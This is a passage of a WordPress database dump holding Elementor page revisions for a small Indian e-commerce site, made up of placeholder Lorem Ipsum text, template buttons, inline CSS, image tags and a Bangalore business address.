sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-testimonial-wrapper{overflow:hidden;text-align:center}.elementor-testimonial-wrapper .elementor-testimonial-content{font-size:1.3em;margin-bottom:20px}.elementor-testimonial-wrapper .elementor-testimonial-name{line-height:1.5;display:block}.elementor-testimonial-wrapper .elementor-testimonial-job{font-size:.85em;display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta{width:100%;line-height:1}.elementor-testimonial-wrapper .elementor-testimonial-meta-inner{display:inline-block}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image{display:table-cell;vertical-align:middle}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image img{width:60px;height:60px;border-radius:50%;-o-object-fit:cover;object-fit:cover;max-width:none}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-image{padding-right:15px}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-details{text-align:left}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{margin-bottom:20px}</style>		\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 13:20:26','2022-09-30 07:50:26','',1373,'https://gopalak.in/?p=1510',0,'revision','',0),(1512,1,'2022-10-03 10:16:00','2022-10-03 04:46:00','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-divider{--divider-border-style:none;--divider-border-width:1px;--divider-color:#2c2c2c;--divider-icon-size:20px;--divider-element-spacing:10px;--divider-pattern-height:24px;--divider-pattern-size:20px;--divider-pattern-url:none;--divider-pattern-repeat:repeat-x}.elementor-widget-divider .elementor-divider{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-divider .elementor-divider__text{font-size:15px;line-height:1;max-width:95%}.elementor-widget-divider .elementor-divider__element{margin:0 var(--divider-element-spacing);-ms-flex-negative:0;flex-shrink:0}.elementor-widget-divider .elementor-icon{font-size:var(--divider-icon-size)}.elementor-widget-divider .elementor-divider-separator{display:-webkit-box;display:-ms-flexbox;display:flex;margin:0;direction:ltr}.elementor-widget-divider--view-line_icon .elementor-divider-separator,.elementor-widget-divider--view-line_text .elementor-divider-separator{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-divider--view-line_icon .elementor-divider-separator:after,.elementor-widget-divider--view-line_icon .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:\"\";border-bottom:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--element-align-left .elementor-divider .elementor-divider-separator>.elementor-divider__svg:first-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-left .elementor-divider-separator:before{content:none}.elementor-widget-divider--element-align-left .elementor-divider__element{margin-left:0}.elementor-widget-divider--element-align-right .elementor-divider .elementor-divider-separator>.elementor-divider__svg:last-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-right .elementor-divider-separator:after{content:none}.elementor-widget-divider--element-align-right .elementor-divider__element{margin-right:0}.elementor-widget-divider:not(.elementor-widget-divider--view-line_text):not(.elementor-widget-divider--view-line_icon) .elementor-divider-separator{border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--separator-type-pattern{--divider-border-style:none}.elementor-widget-divider--separator-type-pattern.elementor-widget-divider--view-line .elementor-divider-separator,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:after,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:before,.elementor-widget-divider--separator-type-pattern:not([class*=elementor-widget-divider--view]) .elementor-divider-separator{width:100%;min-height:var(--divider-pattern-height);-webkit-mask-size:var(--divider-pattern-size) 100%;mask-size:var(--divider-pattern-size) 100%;-webkit-mask-repeat:var(--divider-pattern-repeat);mask-repeat:var(--divider-pattern-repeat);background-color:var(--divider-color);-webkit-mask-image:var(--divider-pattern-url);mask-image:var(--divider-pattern-url)}.elementor-widget-divider--no-spacing{--divider-pattern-size:auto}.elementor-widget-divider--bg-round{--divider-pattern-repeat:round}.rtl .elementor-widget-divider .elementor-divider__text{direction:rtl}.e-container>.elementor-widget-divider{width:var(--container-widget-width,100%);--flex-grow:var(--container-widget-flex-grow,0)}</style>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-testimonial-wrapper{overflow:hidden;text-align:center}.elementor-testimonial-wrapper .elementor-testimonial-content{font-size:1.3em;margin-bottom:20px}.elementor-testimonial-wrapper .elementor-testimonial-name{line-height:1.5;display:block}.elementor-testimonial-wrapper .elementor-testimonial-job{font-size:.85em;display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta{width:100%;line-height:1}.elementor-testimonial-wrapper .elementor-testimonial-meta-inner{display:inline-block}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image{display:table-cell;vertical-align:middle}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image img{width:60px;height:60px;border-radius:50%;-o-object-fit:cover;object-fit:cover;max-width:none}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-image{padding-right:15px}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-details{text-align:left}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{margin-bottom:20px}</style>		\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-03 10:16:00','2022-10-03 04:46:00','',1373,'https://gopalak.in/?p=1512',0,'revision','',0),(1513,1,'2022-10-03 10:16:00','2022-10-03 04:46:00','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-divider{--divider-border-style:none;--divider-border-width:1px;--divider-color:#2c2c2c;--divider-icon-size:20px;--divider-element-spacing:10px;--divider-pattern-height:24px;--divider-pattern-size:20px;--divider-pattern-url:none;--divider-pattern-repeat:repeat-x}.elementor-widget-divider .elementor-divider{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-divider .elementor-divider__text{font-size:15px;line-height:1;max-width:95%}.elementor-widget-divider .elementor-divider__element{margin:0 var(--divider-element-spacing);-ms-flex-negative:0;flex-shrink:0}.elementor-widget-divider .elementor-icon{font-size:var(--divider-icon-size)}.elementor-widget-divider 